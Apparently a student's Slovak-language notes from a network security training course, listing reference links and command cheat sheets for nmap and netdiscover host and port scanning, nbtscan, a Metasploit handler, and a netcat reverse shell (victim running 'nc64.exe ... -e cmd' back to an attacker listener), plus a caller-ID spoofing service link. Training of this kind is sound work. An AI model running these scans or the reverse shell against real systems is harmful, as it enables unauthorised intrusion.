GOC3 - Sitova bezpecnost
Zaujimave linky pouzite na skoleni
- archive web
- Zranitelnosti na mojej URL
https://www.shodan.io/host/46.36.36.173
- Podkasty
https://ceskepodcasty.cz/podcast/cyber-rangers-podcast
- MITRE ATT&CK je obrovská verejná databáza všetkých známych techník, ktoré útočníci používajú pri kybernetických útokoch – od prvého prieniku do siete až po krádež dát či zničenie systému.
- Register zmluv
- Spoofovanie cisel
Protect Your Privacy | SpoofCard
- kiniha
Good Commands
- Nmap
ping na celu sitet
nmap -sn 192.168.56.0/24
scan portov na celu siet
nmap -T4 192.168.56.0/24
NetCat - reverse cmd
server : attacker
nc -lvvp 443
clinet : victim
C:\Users\Student\Desktop\Tools\netcat-win32-1.12>nc64.exe 1.2.3.170 443 -e cmd
tools in kali:
msfconsole
msfconsole (list of tools)use exploit/multi/handler (reverse cmd server)set LHOST 1.2.3.170set LPORT 443set exitonsession falseshow optionshelp
Maskovanie skriptou:
Obfuskace
poggoglit
- metasploit .. toolbox na zranitelnosti
Cool Tools
autoruns: https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
- can scan with virustotal in options
process explorer: https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer
- can scan with virustotal in options
process monitor: https://learn.microsoft.com/en-us/sysinternals/downloads/procmon
NETDISCOVER
pouziti aktivni arp sken netdiscover:
netdiscover -i eth1 -r 192.168.56.0/24
pasivny discover
netdiscover -i eth1 -r 192.168.56.0/24 -p
NMAP
aktivni arp sken nmap
nmap -sn -PR 192.168.56.0/24
nmap -sn -PR 192.168.56.0/24 | grep "Nmap scan report" | awk '{print $5}'
SKEN NA CIZI sit
nmap -sn 10.2.132.0/24 -T5
nmap -sn 10.2.132.0/24 -T5 -PS445,135,3389
nmap -sn 10.2.132.0/24 -T5 -PS445,135,3389 -oG - | awk '/Up$/{print $2}' > live_hosts.txt
nmap -sT -iL live_hosts.txt -T5 -Pn -p 80,443,3389,5985,445,21,88 --disable-arp-ping
netbios
nbtscan -r 192.168.1.0/24
TYPY UTOKOV
Komentáre ku článku
Zatiaľ žiadne komentáre.